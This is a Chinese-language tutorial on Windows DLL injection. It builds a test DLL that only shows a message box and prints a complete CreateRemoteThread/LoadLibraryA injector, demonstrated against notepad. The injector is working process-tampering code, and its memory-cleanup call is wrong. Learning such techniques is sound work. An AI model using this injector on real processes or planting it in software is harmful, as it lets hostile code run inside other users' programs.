什么是dll注入?
DLL注入允许将外部DLL文件加载到进程中并运行其中的代码。DLL(动态链接库)是一种可重用的代码库,它包含在多个程序中使用的函数、类、变量和其他程序代码。DLL注入技术可以通过将DLL文件注入到目标进程的地址空间中,从而允许程序能够访问其中的代码和数据。DLL注入通常用于许多不同的目的,包括增强程序的功能,修改程序的行为,以及执行恶意活动,如间谍软件或病毒。在某些情况下,DLL注入也可以用于调试或测试程序,或者在某些特定场景下进行一些修改或定制。(来自ChatGpt的解释)
生成dll文件
我这里使用DevCpp新建了dll项目:
新建的项目有两个文件,一个是dll.h,一个是dllmain.cpp,将这两个文件修改为如下代码,在dll被映射到了进程的地址空间时弹窗:
dll.h代码:
#ifndef _DLL_H_
#define _DLL_H_
#if BUILDING_DLL
#define DLLIMPORT __declspec(dllexport)
#else
#define DLLIMPORT __declspec(dllimport)
#endif
class DLLIMPORT DllClass
{
};
#endif
dllmain.cpp代码:
/* Replace "dll.h" with the name of your header */
#include "dll.h"
#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved)
{
switch(fdwReason)
{
case DLL_PROCESS_ATTACH:
{
//当这个DLL被映射到了进程的地址空间时
MessageBox(0, "inj!\n","inj",MB_ICONINFORMATION);
break;
}
case DLL_PROCESS_DETACH:
{
//这个DLL从进程的地址空间中解除映射
break;
}
case DLL_THREAD_ATTACH:
{
//一个线程正在被创建
break;
}
case DLL_THREAD_DETACH:
{
//线程终结
break;
}
}
/* Return TRUE on success, FALSE on failure */
return TRUE;
}
然后进行编译得到test.dll文件。
编写注入文件
主要步骤如下:
- (1)打开目标进程
- (2)分配目标进程的内存
- (3)将dll加载到目标进程
- (4)在目标进程中创建新的线程
这里涉及到的函数有:
(1)OpenProcess:用于打开指定进程的句柄,以便在进程间进行通信或操作。
HANDLE OpenProcess(
DWORD dwDesiredAccess, // 访问权限
BOOL bInheritHandle, // 是否继承句柄
DWORD dwProcessId // 进程ID
);
(2)VirtualAllocEx:为远程进程分配内存缓冲区,这个函数可以用于实现共享内存,动态加载DLL文件,以及创建线程栈等操作。
LPVOID VirtualAllocEx(
HANDLE hProcess, // 目标进程句柄
LPVOID lpAddress, // 分配的内存地址
SIZE_T dwSize, // 分配的内存大小
DWORD flAllocationType,// 内存分配类型
DWORD flProtect // 内存保护属性
);
(3)WriteProcessMemory:在进程之间复制数据,该函数可用于在不同进程之间共享数据,或者在同一进程中的不同线程之间共享数据。:
BOOL WriteProcessMemory(
HANDLE hProcess, // 目标进程句柄
LPVOID lpBaseAddress, // 目标内存地址
LPCVOID lpBuffer, // 写入数据的缓冲区
SIZE_T nSize, // 写入数据的大小
SIZE_T *lpNumberOfBytesWritten // 实际写入数据的大小
);
(4)CreateRemoteThread:用于在指定进程中创建一个远程线程,并在远程线程中执行指定的函数。该函数可用于在不同进程之间执行函数,或者在同一进程中的不同线程之间执行函数。
HANDLE CreateRemoteThread(
HANDLE hProcess, // 目标进程句柄
LPSECURITY_ATTRIBUTES lpThreadAttributes,// 线程安全属性
SIZE_T dwStackSize, // 线程栈大小
LPTHREAD_START_ROUTINE lpStartAddress, // 线程入口地址
LPVOID lpParameter, // 线程参数
DWORD dwCreationFlags, // 线程创建标志
LPDWORD lpThreadId // 线程ID
);
(5)WaitForSingleObject:用于等待一个指定的对象变为有信号状态。
DWORD WaitForSingleObject(
HANDLE hHandle, // 要等待的对象的句柄
DWORD dwMilliseconds // 等待时间,以毫秒为单位
);
(6)VirtualFreeEx:用于释放指定进程中的虚拟内存。
BOOL VirtualFreeEx(
HANDLE hProcess, // 要释放虚拟内存的进程的句柄
LPVOID lpAddress, // 要释放的虚拟内存的起始地址
SIZE_T dwSize, // 要释放的虚拟内存的大小,以字节为单位
DWORD dwFreeType // 释放类型
);
完整代码如下:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <tlhelp32.h>
char evilDLL[] = "C:\\Users\\16537\\Desktop\\test.dll";
unsigned int evilLen = sizeof(evilDLL) + 1;
int main(int argc, char* argv[]) {
HANDLE ph; // 进程句柄
HANDLE rt; // 远程线程
LPVOID rb; // 远程内存
// 获取LoadLibraryA函数的地址
HMODULE hKernel32 = GetModuleHandle("Kernel32");
VOID *lb = (VOID *)GetProcAddress(hKernel32, "LoadLibraryA");
// 判断进程是否存在
if ( atoi(argv[1]) == 0) {
printf("PID not found!\n");
return -1;
}
printf("PID: %i", atoi(argv[1]));
// 打开目标进程
ph = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
// 分配远程进程的内存
rb = VirtualAllocEx(ph, NULL, evilLen, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
// 在进程间复制dll
WriteProcessMemory(ph, rb, evilDLL, evilLen, NULL);
// 在目标进程中创建新的线程
rt = CreateRemoteThread(ph, NULL, 0, (LPTHREAD_START_ROUTINE)lb, rb, 0, NULL);
// 等待远程线程执行结束
WaitForSingleObject(rt, INFINITE);
// 清理内存空间
VirtualFreeEx(ph, rb, 0, evilLen);
CloseHandle(ph);
CloseHandle(rt);
return 0;
}
这里将dll注入到notepad中,先打开一个记事本,通过processhacker找到PID:
接着编译上面的代码得到evil_inj.exe,再运行这个exe:
可以看到注入成功,在processhacker中可以看到notepad加载了test.dll。
